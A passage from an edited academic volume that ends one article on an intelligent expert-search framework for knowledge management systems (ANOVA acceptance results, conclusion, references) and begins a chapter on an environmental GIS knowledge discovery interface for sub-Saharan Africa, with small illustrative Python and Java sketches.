the two user groups in terms of perceived usefulness and perceived ease of use, we conducted one-way ANOVA tests, which can reveal statistically meaningful differences in their perceptions of each system by comparing the variances of their answers. The results of the experiment are summarized in Table 4. From the table, we can conclude that there is a statistically meaningful difference in perceived usefulness between the groups (p-value = .000) and no meaningful difference in perceived ease of use (p-value = .106) at the 95% significance level. Since the mean value of the FAH-based system group is lower than that of the other group on the perceived usefulness factor, and a lower score on the scale used indicates stronger agreement, the participants viewed the FAH-based system as more useful than the legacy system. In summary, an FAH-based system using the framework proposed in this article is better in terms of perceived usefulness, and there is no statistically meaningful difference between the two groups in terms of perceived ease of use. Therefore, we can conclude that users are willing to accept the intelligent expert management features in their work because they consider them useful, and at the same time the new system features would be as easy to learn as those of traditional systems.
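For illustration, a one-way ANOVA of the kind reported in Table 4 could be computed as sketched below; the rating arrays are hypothetical stand-ins for the two groups' responses (the article's raw data are not given), and scipy is assumed to be available.

```python
from scipy.stats import f_oneway

# Hypothetical averaged perceived-usefulness ratings per participant
# (1 = Strongly Agree ... 7 = Strongly Disagree); not the article's data.
legacy_usefulness = [3.2, 3.5, 2.8, 3.9, 3.1, 3.6, 3.4]   # legacy-system group
fah_usefulness    = [2.1, 2.4, 1.9, 2.6, 2.2, 2.0, 2.3]   # FAH-based-system group

f_stat, p_value = f_oneway(legacy_usefulness, fah_usefulness)
print(f"F = {f_stat:.3f}, p = {p_value:.3f}")
# A p-value below .05, as reported in Table 4 for perceived usefulness
# (F = 41.463, p = .000), indicates a statistically meaningful difference.
```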
SUMMARY AND CONCLUSION

Managing tacit knowledge is considered critical for staying competitive in today's business world. Although many approaches have been developed and proposed for this challenging task, few successful results can be found. One research direction in the knowledge management field has proposed that providing effective and efficient search functionality for experts is a feasible solution for managing tacit knowledge, since it is not always possible or reasonable to separate intangible knowledge from its holders or to codify it; such knowledge is usually embedded in the intrinsic skills or know-how of the experts within the organization. In this article, we propose an intelligent search framework for experts that is applicable to knowledge management systems. The following advantages are manifest in adopting the proposed framework. First, KMS can be equipped with intelligent search capabilities for experts, which include finding experts in similar or related fields and providing the comparative expertise level of each expert. Knowing the best candidates available for solving the problems at hand can increase users' satisfaction with the search results, especially when there are no experts matching the search condition exactly. Second, the expert profiling process can be automated using the proposed expertise structure. Maintaining up-to-date expert profiles is a necessary requirement for providing accurate information to users. Although the importance of this task is well known, it is not trivial since it requires constant maintenance costs and time. Automating the expert profiling process can reduce the maintenance costs involved as well as increase the objectivity of a process which might otherwise be somewhat subjective. The expertise profile is defined and used to calculate the expertise level of experts, and the calculated expertise measures are also provided as additional information to help users determine the experts they might contact for help. Third, the knowledge representation framework called FAH has been improved by adopting a text categorization technique to calculate initial similarity measures among sibling fields in the hierarchy, which previously had to be assigned by a domain expert. This improvement also reduces the maintenance costs of a system adopting the intelligent search framework for experts by automating the update process of the subject field hierarchy, which provides the basis for expert profiling and the search functionality for similar experts.
As further research, we are trying to expand the intelligent search framework for experts to incorporate multidisciplinary knowledge artifacts. While devising ways to adopt differentiated similarity measures for level differences, which are assumed to be 1 in this article, we are also focusing on algorithmic research to improve the efficiency of the automatic expert classifier.
ACKNOWLEDGMENT

This research was supported by the Ministry of Information and Communication, Korea, under the College Information Technology Research Center Support Program, grant number IITA2005-C1090-0502-0016.
REFERENCES

Alavi, M., & Leidner, D.E. (2001). Review: Knowledge management and knowledge management systems: Conceptual foundations and research issues. MIS Quarterly, 25(1), 107-136.

Augier, M., & Vendelo, M.T. (1999). Networks, cognition and management of tacit knowledge. Journal of Knowledge Management, 3(4), 252-261.
Baeza-Yates, R., & Riberio-Neto, B. (1999). Modern information retrieval. New York: ACM Press.

Belkin, N.J., & Croft, W.B. (1992). Information filtering and information retrieval: Two sides of the same coin? Communications of the ACM, 35(12), 29-38.

Booch, G., Rumbaugh, J., & Jacobson, I. (1999). The unified modeling language user guide. Boston: Addison Wesley.

Braga, J.L., Laender, A.H.F., & Ramos, C.V. (2000). A knowledge-based approach to cooperative relational database querying. International Journal of Pattern Recognition and Artificial Intelligence, 14(1), 73-90.

Buckingham-Shum, S.J., & Hammond, N. (1994). Argumentation-based design rationale: What use at what cost? Human-Computer Studies, 40(4), 603-652.

Cai, Y., Cercone, N., & Han, J. (1993). Attribute-oriented induction in relational databases. Knowledge discovery in databases. Maryland: AAAI/MIT Press.

Chan, T.M. (1998). Approximate nearest neighbor queries revisited. Discrete & Computational Geometry, 20(3), 359-374.

Chomicki, J. (2004). Semantic optimization of preference queries. In Proceedings of the 1st International Symposium on Constraint Databases (pp. 128-142).

Conklin, J.E., & Yakemovic, K.B. (1991). A process-oriented approach to design rationale. Human-Computer Interaction, 6(3-4), 357-391.

Corcho, O., Fernandez-Lopez, M., & Gomez-Perez, A. (2003). Methodologies, tools, and languages for building ontologies. Where is their meeting point? Data & Knowledge Engineering, 46(1), 41-64.

Dang, T.K., Kung, J., & Wagner, R. (2002). A general and efficient approach for solving nearest neighbor problem in the vague query system. LNCS 2419 (pp. 367-378).

Davis, F.D. (1989). Perceived usefulness, perceived ease of use, and user acceptance of information technology. MIS Quarterly, 13(3), 319-340.

Desouza, K.C. (2003). Barriers to effective use of knowledge management systems in software engineering. Communications of the ACM, 46(1), 99-101.
Dubois, D., & Prade, H. (1980). Fuzzy sets and systems: Theory and applications. London: Academic Press.

Furnas, G.W., Deerwester, S., Dumais, S.T., Landauer, T.K., Harshman, R.A., & Streeter, L.A. (1988). Information retrieval using a singular value decomposition model of latent semantic structure. In Proceedings of the 11th Annual International ACM SIGIR Conference on Research and Development in Information Retrieval (pp. 465-480).

Gentili, G.L., Marinilli, M., Micarelli, A., & Sciarrone, F. (2001). Text categorization in an intelligent agent for filtering information on the Web. International Journal of Pattern Recognition and Artificial Intelligence, 15(3), 527-549.

Handysoft (2003). BizFlow KMS. Retrieved March 2, 2007, from http://corona.handysoft.co.kr/eng/

Hansen, M.T., Nohria, N., & Tierney, T. (1999). What's your strategy for managing knowledge? Harvard Business Review, 77(2), 106-116.

Hu, X., Pang, J., Pang, Y., Atwood, M., Sun, W., & Regli, W.C. (2000). A survey on design rationale: Representation, capture and retrieval. In Proceedings of 2000 ASME Design Engineering Technical Conferences (pp. 10-13). Baltimore, MD.

Huh, S.Y., & Lee, J.W. (2001). Providing approximate answers using a knowledge abstraction database. Journal of Database Management, 12(2), 14-24.

Huh, S.Y., Moon, K.H., & Lee, H. (2000). A data abstraction approach for query relaxation. Information and Software Technology, 42(6), 407-418.

Jurisica, I., Mylopoulos, J., & Yu, E. (2004). Ontologies for knowledge management: An information systems perspective. Knowledge and Information Systems, 6(4), 380-401.
Kakabadse, N.K., Kouzmin, A., & Kakabadse, A. (2001). From tacit knowledge to knowledge management: Leveraging invisible assets. Knowledge and Process Management, 8(3), 137-154.

King, W.R. (2006). The critical role of information processing in creating an effective knowledge organization. Journal of Database Management, 17(1), 1-15.

Klein, M., & Konig-Ries, B. (2004). Combining query and preference: An approach to fully automatize dynamic service binding. In Proceedings of IEEE International Conference on Web Services (pp. 788-791).

Ko, Y., Park, J., & Seo, J. (2004). Improving text categorization using the importance of sentences. Information Processing and Management, 40(1), 65-79.

Kreiner, K. (2002). Tacit knowledge management: The role of artifacts. Journal of Knowledge Management, 6(2), 112-123.

Kwan, M.M., & Cheung, P.K. (2006). The knowledge transfer process: From field studies to technology development. Journal of Database Management, 17(1), 16-32.

Kwon, O.W., & Lee, J.H. (2003). Text categorization based on k-nearest neighbor approach for Web site classification. Information Processing and Management, 39(1), 25-44.

Lam, W., Ruiz, M., & Srinivasan, P. (1999). Automatic text categorization and its application to text retrieval. IEEE Transactions on Knowledge and Data Engineering, 11(6), 865-879.

Lee, D.L., Chuang, H., & Seamons, K. (1997). Document ranking and the vector-space model. IEEE Software, 14(2), 67-75.

Lertnattee, V., & Theeramunkong, T. (2004). Effect of term distributions on centroid-based text categorization. Information Sciences, 158, 89-115.
Liebowitz, J. (2001). Knowledge management and its link to artificial intelligence. Expert Systems with Applications, 20(1), 1-6.

McCallum, A.K. (1996). Bow: A toolkit for statistical language modeling, text retrieval, classification and clustering. Retrieved March 2, 2007, from http://www.cs.cmu.edu/~mccallum/bow/

Microsoft (2004). Microsoft SharePoint products and technologies. Retrieved March 2, 2007, from http://www.microsoft.com/sharepoint/

Moon, K.H., & Huh, S.Y. (in press). An integrated query relaxation approach adopting data abstraction and fuzzy relation. Information Systems Research.

Nah, F., Siau, K., & Tian, Y. (2005). Knowledge management mechanisms of financial service sites. Communications of the ACM, 48(6), 117-123.

Nonaka, I., & Takeuchi, H. (1995). Knowledge creating company. New York: Oxford University Press.

O'Dell, C., & Grayson, C.J. (1998). If only we knew what we know: Identification and transfer of internal best practices. California Management Review, 40(3), 154-174.

Ruiz, M.E., & Srinivasan, P. (2002). Hierarchical text categorization using neural networks. Information Retrieval, 5(1), 87-118.

Rus, I., & Lindvall, M. (2002). Knowledge management in software engineering. IEEE Software, 19(3), 26-38.

Salton, G., & Lesk, M.E. (1968). Computer evaluation of indexing and text processing. Journal of the ACM, 15(1), 8-36.

Salton, G., & Yang, C.S. (1973). On the specification of term values in automatic indexing. Journal of Documentation, 29, 351-372.

Siau, K. (2000). Knowledge discovery as an aid to organizational creativity. Journal of Creative Behavior, 34(4), 248-258.

Sorensen, C., & Snis, U. (2001). Innovation through knowledge codification. Journal of Information Technology, 16(2), 83-97.

Sugumaran, V., & Storey, V.C. (2002). Ontologies for conceptual modeling: Their creation, use, and management. Data & Knowledge Engineering, 42(3), 251-271.

Tokunaga, T., & Iwayama, M. (1994). Text categorization based on weighted inverse document frequency (Technical Report). Advanced Research Laboratory, Hitachi Ltd.

Turtle, H., & Croft, W.B. (1991). Evaluation of an inference network-based retrieval model. ACM Transactions on Information Systems, 9(3), 187-222.

Verity (2004). Verity K2 architecture: Unprecedented performance, scalability and fault tolerance. Retrieved March 2, 2007, from http://www.verity.com/products/k2_enterprise/

Zadeh, L. (1973). Outline of a new approach to the analysis of complex systems and decision processes. IEEE Transactions on Systems, Man, and Cybernetics, SMC-3(1), 28-44.
This work was previously published in Journal of Database Management, edited by K. Siau, Volume 18, Issue 3, pp. 48-68, copyright 2007 by IGI Publishing, formerly known as Idea Group Publishing (an imprint of IGI Global).
Chapter 2.19
Building an Environmental GIS Knowledge Infrastructure Inya Nlenanya Iowa State University, USA
ABSTRACT

Technologies such as geographic information systems (GIS) enable geospatial information to be captured, updated, integrated, and mapped easily and economically. These technologies create both opportunities and challenges for achieving wider and more effective use of geospatial information in stimulating and sustaining sustainable development through smart policy making. This chapter proposes a simple and accessible conceptual knowledge discovery interface that can be used as a tool to accomplish that. In addition, it addresses some issues that might make this knowledge infrastructure stimulate sustainable development with emphasis on sub-Saharan Africa.
INTRODUCTION

Technologies such as geographic information systems (GIS) enable geographic information to be captured, updated, integrated, and mapped easily
and economically. These technologies create both opportunities and challenges for achieving wider and more effective use of geoinformation in stimulating and sustaining sustainable development through smart policy making. With the start of a new millennium humankind faces environmental changes greater in magnitude than ever before as the scale of the problem shifts from local to regional and to global. Environmental problems such as global climate change and unsustainable developments in many parts of the world are evolving as major issues for the future of the planet and of mankind. Acidification of lakes and rivers, destruction of vital natural wetlands, loss of biotic integrity and habitat fragmentation, eutrophication of surface waters, bioaccumulation of toxic pollutants in the food web, and degradation of air quality provide some of the many examples of how human-induced changes have impacted the Earth system. These human-induced changes are stressing natural systems and reducing biological diversity at a rate and magnitude not experienced for millions of years (Speth,
2004). Also, anthropogenic stresses such as those associated with population growth, dwindling resources, chemical and biological pollution of water resources are expected to become more acute and costly. The approach in dealing with these environmental issues requires a balanced response in the form of an environmental management strategy. Such a response must utilize the best available scientific understanding and data in addition to an infrastructure that combines both in order to deliver sound science-based solutions to the myriad of environmental problems. In the Fall 2003 edition of the Battelle Environmental Updates, it was argued that such a response would result in a complex decision network. This argument must have inspired the National Science Foundation (NSF) in 2004 to propose a network of infrastructure called National Ecological Observatory Network (NEON). NEON supports continental-scale research targeted to address the environmental challenges by facilitating the study of common themes and the transfer of data and information across research sites (NAS, 2004). This creates a platform that enables easy and quick access to the environmental data needed to tackle the environmental challenges. NEON is based on the same concept as grid computing. Grid computing eliminates the need to have all data in one place through on-demand aggregation of resources at multiple sites (Chetty & Buyya, 2002). This creates an enabling platform for the collection of more specialized data with the hope of integrating them with data from other related areas. This has particular benefit in environmental data management and analysis since both data and specific processing methods are frequently exchanged and used within various organizations (Vckovski & Bucher, 1996). Together, NEON and grid computing form the enabler for the construction of an environmental cyberinfrastructure that will permit the transfer of data, the specific processing methods and the
interoperability of these methods so as to reduce the time wasted in duplication of resources. This infrastructure is necessary especially in the face of unprecedented data availability. During the last decade, society has witnessed a tremendous development in the capabilities to generate and acquire environmental data to support policy and decision-making. Furthermore, the rapid and exploding growth of online environmental data due to the Internet and the widespread use of ecological and biological databases have created an immense need for intuitive knowledge discovery and data mining methodologies and tools. However, Africa deserves special attention when establishing such networks: according to Song (2005), an average university there has the same aggregate bandwidth as a single home user in North America or Europe and pays more than 50 times more for this bandwidth than its counterparts in Europe or North America. These statistics come from a continent whose major issues include hunger, poverty, AIDS, and political instability, and they summarize why sub-Saharan Africa in this knowledge age is still undeveloped and unable to tackle her own environmental problems. Clearly, a survey of the wealthiest nations in the world would quickly reveal that GDP is directly proportional to the volume of digital information exchange. Technology transfer has not been able to make a mark in Africa simply because the proponents ignored the social and economic questions of access to markets, fair wages, water, land rights, and so forth, in favor of purely technical questions, rejecting indigenous knowledge in the process. Hence, with all the progress made in cutting-edge technology for data acquisition, there is still a dearth of geographic information exchange in sub-Saharan Africa. Sobeih (2005) argues that, “GIS is considered to be one of the most important tools for increased public participation and development that offers
new socio-economic development opportunities. It can encourage human resource development within the country, facilitate the participation of youth in public life, help provide an analytic and scientific understanding of development issues, and much more” (p. 190). Evidently, in a region of the world marked by political instability, the role of the private sector and the ordinary citizen has become elevated. Hence the need to increase capacity for handling GIS tools in environmental policy making. All the more important is this environmental GIS knowledge interface, as the wealth of the continent lies in the environment. The participants at the AFRICAGIS 2005 Conference, which was held in South Africa, concluded their deliberations by recognizing the opportunity provided by geospatial information for use in the development of Africa. Consequently, the specific objectives of this chapter are:

1. To develop a simple and accessible conceptual knowledge infrastructure that can be used as a tool to introduce GIS into the education curriculum in sub-Saharan Africa
2. To adapt (1) to the current context of sub-Saharan Africa, taking into account the prevailing social and economic questions
3. To proffer policies for development in sub-Saharan Africa
BACKGROUND

From the history of GIS, it is without doubt that environmental application has been one of the motivating factors that led to the development of GIS in the mid-1960s (Longley, Goodchild, Maguire & Rhind, 2001). This is due to the fact that environmental issues arise as a result of human activities and almost all human activities involve a geographic component (Blaschke, 2001; Longley et al., 2001; Rautenstrauch & Page, 2001). From
infancy in land use applications in Canada, GIS has evolved to an all enveloping technology that has found useful applications in every facet of human enterprise. Technologies such as global positioning systems (GPSs) and remote sensing satellites have been largely responsible for the GIS evolution complemented with reductions in the cost of computer hardware, electronic storage media, etc (Chainey & Ratcliffe, 2005; Longley et al., 2001). Ratcliffe (2004) believes that in addition to the technology aspect of GIS evolution, the discipline has also benefited immensely from what he refers to as the scientific development of the discipline, an angle developed by Goodchild (1991) and Longley et al. (2001). As a result, GIS has seen the adaptation of analytical methods, techniques and processes to problems with a spatial component—and every human activity has a spatial axis, thereby making GIS omnipresent in modern life (Chainey & Ratcliffe, 2005) and a partner in development. As a partner in development, there is need to leverage all the utility of GIS to increase the environmental knowledge base in sub-Saharan Africa. In the global economy, knowledge is everything, which is one thing that industrialized countries have in common (Mokyr, 2002). But before one gets to knowledge, data is needed. There is a dearth of environmental data in developing countries (Kufoniyi, Huurneman & Horn, 2005; Rüther, 2001). And where they are available, they are not in digital format (Dunn, Atkins & Townsend, 1997). Organizations such as Environmental Information Systems-Africa (EIS-Africa), USAID and other notable international organizations have been in the forefront of the campaign to bridge the environmental knowledge gap by concentrating on human and institutional capacity building in the GIS sector and in encouraging the integration of GIS into policy making. As a way of strengthening these efforts, this chapter proposes a knowledge discovery interface.
KNOWLEDGE DISCOVERY INTERFACE

A knowledge discovery interface (KDI) is a type of interface that provides the means by which users can connect the suite of data mining tools so that they communicate with each other, irrespective of their implementation, and at the same time communicate with the data. A KDI defines the range of permissible inputs, outputs and controls between the elements that make up the knowledge discovery process, in order to encourage more participation from various fields of study which may not be part of the traditional data mining research catchment area. The knowledge discovery process is a computationally intensive task consisting of complex interactions between a human and a large database, supported by a heterogeneous suite of tools (Brachman & Anand, 1996). Consequently, a knowledge discovery interface defines the rules for the complex interactions not just between the user and a large database but, most importantly, between the heterogeneous suite of tools and a large assortment of databases. It is very important that this suite of data mining tools sees the assortment of databases as a whole and not just as a sum of the parts, since the best picture is being looked for. In this case, the best picture is one that takes from all sources and presents an output that is unique to all its sources. This is very significant because in knowledge discovery the object is not to look for the obvious but for some interesting pattern (Fayyad, Piatetsky-Shapiro & Smyth, 1996) that can be used for decision making. To further understand the concept of the KDI, the author is going to look at some of the definitions of knowledge discovery in databases in order to get a better understanding of the knowledge discovery process. Koua and Kraak (2004) define knowledge discovery as a higher level process using information from the data mining process to turn it into knowledge or integrate it with prior
knowledge. They went on to present a more general definition, borrowing from Miller and Han (2001) and Fayyad et al. (1996), as "discovering and visualizing the regularities, structures and rules from data, discovering useful knowledge from data and for finding new knowledge." This definition takes into account the research area of data visualization, which hitherto has been largely ignored in knowledge discovery research (Lee, Ong & Quek, 1995). From this definition, a KDI provides the means of integrating the discovery of information from a database via statistical techniques and machine learning with visualization techniques, so that the two work seamlessly to extract new knowledge or add to existing knowledge. A KDI provides the means for controlling the complex processes of extraction, organization and presentation of discovered information from a database (Brachman & Anand, 1996). This definition encompasses the various steps in the knowledge discovery process. In Miller (in press) the knowledge discovery process is grouped into the following steps, as shown in Figure 1:

• Data preprocessing (data selection, data cleaning and data reduction)
• Data mining (choosing the data mining task, choosing the data mining technique and data mining)
• Knowledge construction (interpreting the mined patterns and consolidating the discovered knowledge)

The steps are independent and, therefore, a KDI provides the protocol that connects the steps. Mitra and Acharya (2003) add a new dimension in their assessment of the knowledge discovery process as involving all that has been mentioned above plus the modeling and support of the overall human-machine interaction. A KDI, in short, is the connection between the user, the knowledge discovery tools and the data.
Figure 1. Overview of the knowledge discovery process
Why a Knowledge Discovery Interface is Needed

A KDI simplifies the process of knowledge discovery by making it easy for the user to interact with the wealth of environmental data and the suite of data mining tools available. This has the potential to encourage more participants and to expand the knowledge input into the research field. It provides the key to a human-centered knowledge discovery process that Brachman and Anand (1996) emphasize since it gives the user control over the tools. This control is very important as advances in knowledge discovery technologies are yielding more tools than the user can grasp without the help of a KDI. As a result of the breakthroughs in data storage and data collection technologies, datasets for environmental studies now come in tera- or gigabytes of memory space. This factor is responsible for influencing the advances in artificial neural
networks that have enhanced the analysis and visual mining of large volumes of data. Keim (2002), in his assessment of visual data mining, argued that it gives an overview of the data and is particularly good for noisy, inhomogeneous and large datasets, which are a few of the characteristics of the data available for environmental modeling. He went on to present visual data mining as a hypothesis generation process. It can also be used for hypothesis verification, but in combination with automatic techniques from statistics or machine learning (Lee, Ong, Toh & Chan, 1996). Additionally, visual data mining can help the user to determine whether a certain dataset is the best choice for the targeted learning process. This makes visual data mining an important member of the suite of knowledge discovery tools. Hence the need for the KDI to integrate visual data mining tools with nonvisual data mining tools. With a repertoire of already existing tools for handling spatial data, spatiotemporal data, and
nonspatial data, a knowledge discovery interface will eliminate the need to create a holistic system that handles all the forms of data from scratch. Instead, through a well-developed interface, these existing tools can be integrated for the benefit of knowledge extraction from all kinds of data models available for environmental applications. Examples of these existing tools include ArcGIS and spatial OLAP, or SOLAP, which is an integration of geographic information systems (GIS) and OLAP (Bedard, Gosselin, Rivest, Proulx, Nadeau & Lebel, 2003). Accordingly, the KDI reduces the time required for the deployment of a state-of-the-art knowledge discovery infrastructure. The iterative nature of the knowledge discovery process, which is highlighted in Fayyad et al. (1996), Han (1999), NAS (2003), and Mitra et al. (2003), suggests that the process of applying tools and transformations in the task of knowledge discovery is repeated until the analyst discovers some striking regularities that were not known. This iterative character has the advantage of allowing the entire process to be broken into modules. A KDI is very useful where modules exist because it defines the rules for inter-modular interaction. As a result, a KDI enables a platform that leads to specialized stand-alone applications such that modifications can be made to one part without affecting the entire system. This is a view that Thuraisingham (1999) shares by recommending the development of data mining modules as a collection of generic reusable tools. The contribution of grid computing to the knowledge discovery process comes with its own attendant problem. With the availability of data in intranet repositories and geodata on the Internet, the problem arises of what kind of data would be best for a particular learning process. Albertoni, Bertone, and De Martino (2003) capture this by acknowledging the urgent need for methods and tools to support the user in data exploration. They proposed a solution based on the integration of different techniques including data mining, visualization and graphical interaction techniques.
Their approach aims to aid the user in making the right choice of data by offering both an automated presentation of data to dynamically visualize the metadata and interactive functionalities to discover the relationships among the different metadata attributes. This approach hints at creating a common control platform into which these interactive functionalities can be integrated so that the user can manage them. The KDI provides that common control. Metadata is mentioned here to underscore its prime place in data mining (Thuraisingham, 1999). The bulk of the knowledge discovery process is in the data preprocessing stage. Miller and Han (2001) describe the preprocessing of data, which is partly accomplished in data warehouses, as fundamental to the knowledge discovery process because it integrates and represents data in a manner that supports very efficient querying and processing. Zaiane, Han, Li, and Hou (1998) highlight its importance by observing that most of the studies done in knowledge discovery are confined to the data filtering step, which is part of the data preprocessing stage. This presumes that the success of the overall process centers on how well the data is prepared before mining, since the data preparation process has the power to bias the knowledge that can be extracted. Thuraisingham (1999) makes his own case for the importance of data warehousing in these words: "good data is the key to good mining." As a result, advances in data warehousing and database integration would play a very important role in enhancing the knowledge discovery process. Database integration plays a role here because it provides the input to the data warehousing stage. For environmental applications, the data of choice is geospatial. Currently, conventional conceptual database models do not provide a straightforward mechanism to explicitly capture the semantics related to space (Khatri, Ram & Snodgrass, 2004). However, research is underway to develop tools for automatic integration of geospatial data (from well-structured vector and raster models to unstructured models
such as georeferenced multimedia data) from heterogeneous sources into one coherent source (NAS, 2003). This will enable the design of applications that integrate geospatial data from different sources. The next logical step would be to provide a KDI that integrates these applications into the overall knowledge discovery process. Another argument for a KDI is the fact that data mining, and consequently the overall process of knowledge discovery, is a relatively young and interdisciplinary field, drawing from such areas as database management systems, data warehousing, data visualization, information retrieval, high-performance computing, and so forth. It needs the integration of approaches from multiple disciplines (Han, 1999). The fields that support knowledge discovery all have their own standards, which creates the need for integration. In addition, research is currently underway to address the development of formalized platforms to enhance multidisciplinary research investments (NAS, 2003). A KDI would be advantageous to fully utilize the results of this research.

Figure 2. KDI architecture
KDI System Conceptualization

The KDI system consists of GIS components, data mining components, and the interactions between the two. The degree of integration, which is a measure of the interaction between the components, is loose coupling as opposed to tight coupling. In loose coupling, the interaction is limited in time and space; that is, control and data can be transferred directly between the components, but the interaction is always explicitly initiated by one of the components or by an external agent. In tight coupling, knowledge and data are not only transferred, they can be shared by the components via common internal structures (Alexandre, 1997). A comparison of the two degrees of integration shows that tightly coupled systems would be difficult to upgrade without tearing everything down, and scalability and reusability problems would arise. It would also be difficult to integrate such a system outside of the application domain that warranted its design. Longley et al. (2001) believe that as standards for software development become more widely adopted, software developers and users will prefer software systems whose components are reusable. This gives them the choice of building from scratch or building by components (Longley et al., 2001). From a purely financial standpoint, choice is everything. Consequently, the three main components of the KDI are the geospatial component, the spatial analysis component, and the knowledge component, as shown in Figure 2.
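To make the loose-coupling argument concrete, the sketch below shows one way the three components could interact purely through interfaces, with the KDI acting only as a mediator. It is a minimal illustration in Java, in line with the implementation platform described later; every type and method name here is a hypothetical assumption and does not belong to any vendor API.

```java
// Hypothetical sketch of loosely coupled KDI components: each part is reached
// only through an interface, so one tool can be replaced without touching the rest.
import java.util.List;
import java.util.Map;

interface GeospatialComponent {
    // Returns the records selected by a user query, already filtered.
    List<Map<String, Object>> query(String criteria);
}

interface SpatialAnalysisComponent {
    // Transforms selected records into analysis results (e.g., summary measures).
    Map<String, Double> analyze(List<Map<String, Object>> records);
}

interface KnowledgeComponent {
    // Turns analysis results into decision-support output (rules, model scores).
    String deriveKnowledge(Map<String, Double> analysisResults);
}

/** The KDI only mediates calls; components never share internal structures. */
final class KnowledgeDiscoveryInterface {
    private final GeospatialComponent gis;
    private final SpatialAnalysisComponent analysis;
    private final KnowledgeComponent knowledge;

    KnowledgeDiscoveryInterface(GeospatialComponent gis,
                                SpatialAnalysisComponent analysis,
                                KnowledgeComponent knowledge) {
        this.gis = gis;
        this.analysis = analysis;
        this.knowledge = knowledge;
    }

    /** One pass of the iterative discovery loop: query, analyze, learn. */
    String runIteration(String criteria) {
        List<Map<String, Object>> selected = gis.query(criteria);
        Map<String, Double> results = analysis.analyze(selected);
        return knowledge.deriveKnowledge(results);
    }
}

class KdiSketchDemo {
    public static void main(String[] args) {
        // Trivial stand-in implementations supplied as lambdas.
        GeospatialComponent gis = criteria -> List.of(Map.of("id", (Object) "well-1"));
        SpatialAnalysisComponent analysis = records -> Map.of("count", (double) records.size());
        KnowledgeComponent knowledge = results -> "Derived rule from " + results;
        KnowledgeDiscoveryInterface kdi = new KnowledgeDiscoveryInterface(gis, analysis, knowledge);
        System.out.println(kdi.runIteration("value > 5"));
    }
}
```

Because each component sits behind its own interface, a different GIS toolbox or mining library can be swapped in without reworking the other parts, which is exactly the property the loose-coupling choice is meant to secure.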
The Geospatial Component

The geospatial component is purely a GIS-based tool or assortment of tools. Blaschke (2001) differentiates GIS from other spatial environmental information systems on the basis of its data linkages. Rautenstrauch and Page (2001), in making a case for environmental informatics, argue that environmental studies should not be limited to just ecological data, a view anticipated by Groot and McLaughlin (2000), who opine that the pendulum is moving in favor of a geospatial data infrastructure (GDI). GDI has been described by Coleman and McLaughlin (1997) as an information system linking environmental, socioeconomic, and institutional databases. A key characteristic of geospatial data is its potential for multiple applications (Groot & McLaughlin, 2000), which is a reflection of the technologies, including GPS and remote sensing, that are used to collect such data. In other words, a better understanding of environmental issues lies in integrating purely environmental subjects like ecology, land use, and so forth, with other factors that influence them, for example, the economy. A typical example of this application would be in the area of sustainable development, which is the ability to simultaneously tackle the economic and environmental dimensions of resource distribution and administration (Groot & McLaughlin, 2000). GIS plays the role of presenting these linkages in such a way as to force an environmental view of reality.

The idea of the geospatial component is to provide a toolbox in the KDI that handles data in a way that bridges the gap between data on paper and reality on the ground. According to Thurston, Poiker, and Moore (2003), the accuracy of a model is in its ability to recreate reality accurately. They emphasize that accuracy is a function of the quality of information included in the model. Looking at it from another perspective, given that the quality of the information (data) is acceptable both in content and in how well the contents are integrated, the value of the knowledge extracted from this information would be a function of how the data is encapsulated and manipulated. Figure 3 shows the processing that goes on within the geospatial component. The query connector acts as a kind of filter for selecting the data specified by the user. The selected data is promptly represented using one of the two GIS data models, vector or raster. This ensures consistency between how the features are stored in the database and how they are represented in visual form. The vector/raster block represents the encapsulation of the data for presentation in a visual product or map. The cyclic route linking the components shows a tightly coupled connection, which ensures that at each point on the route the data remain the same, leaving no loophole for data corruption. The two-sided arrow connecting the query to the visual product represents the connection between the data and the visual product, which makes it easy to query the database via the visual product.
Figure 3. Schematics of the interactions within the geospatial component

Against this background, the geospatial component provides the tools that enable the user to edit, display, customize, and output spatial data. It acts as the display unit of the KDI, making use of the geovisualization functionality of the GIS. As a result, researchers are adopting the geovisualization view of GIS in the conceptualization of the geospatial component. This geovisualization view basically sees GIS as a set of intelligent maps or views that show features and feature relationships on the earth (Zeiler, 1999). In this setup, the map acts as a window into the geodatabase (ESRI, 2004), which is at the heart of the GIS architecture. Also, from a knowledge discovery point of view, the geospatial component acts as the exploratory data analysis tool that gives the user a summary of the problem at hand, ensuring a greater grasp of environmental issues.
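As a rough sketch of the query connector just described, the fragment below filters features from a store and hands the selection to the display step in the same vector or raster form in which it is kept. The feature model and class names are simplified assumptions made for illustration, not part of any GIS product.

```java
// Illustrative query connector for the geospatial component. The feature model
// is deliberately minimal; a real geodatabase would carry geometry and metadata.
import java.util.ArrayList;
import java.util.List;
import java.util.function.Predicate;

enum DataModel { VECTOR, RASTER }

class Feature {
    final String id;
    final DataModel model;
    final double attributeValue; // e.g., a measured concentration at this location

    Feature(String id, DataModel model, double attributeValue) {
        this.id = id;
        this.model = model;
        this.attributeValue = attributeValue;
    }
}

class QueryConnector {
    private final List<Feature> store; // stands in for the geodatabase

    QueryConnector(List<Feature> store) { this.store = store; }

    /** Filters stored features; the same objects feed both storage and display. */
    List<Feature> select(Predicate<Feature> criterion) {
        List<Feature> selected = new ArrayList<>();
        for (Feature f : store) {
            if (criterion.test(f)) {
                selected.add(f);
            }
        }
        return selected;
    }
}

class GeospatialComponentDemo {
    public static void main(String[] args) {
        QueryConnector connector = new QueryConnector(List.of(
                new Feature("well-1", DataModel.VECTOR, 4.2),
                new Feature("well-2", DataModel.VECTOR, 9.7)));
        // Select features above a threshold and hand them to the display layer.
        for (Feature f : connector.select(feat -> feat.attributeValue > 5.0)) {
            System.out.println("Render " + f.id + " as " + f.model);
        }
    }
}
```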
The Spatial Component

Vital to understanding the need for a spatial component is the fact that the map or any other visual product is merely a representation of
information stored in a database. The database is the depository of spatial information and not the map (Thurston et al., 2003). Kraak (2000) argues that a map has three major functions in the manipulation of geospatial data:

1. It can function as a catalog of the data available on the database.
2. It can be used to preview available data.
3. It can form part of a database search engine.
In a sense, the map is a guide to other information and as a result can be used to direct the extraction of information from the database. The information so extracted is then subjected to spatial analysis for the purpose of extracting knowledge, which can form the basis for updating the database in terms of reorganizing the way data is integrated or linked. Spatial analysis refers to the ability to manipulate spatial data into different forms and extract additional information as a result (Bailey, 1994). Combining spatial analysis and GIS has long been an area of interest to many researchers. Wise and Haining (1991) identified the three
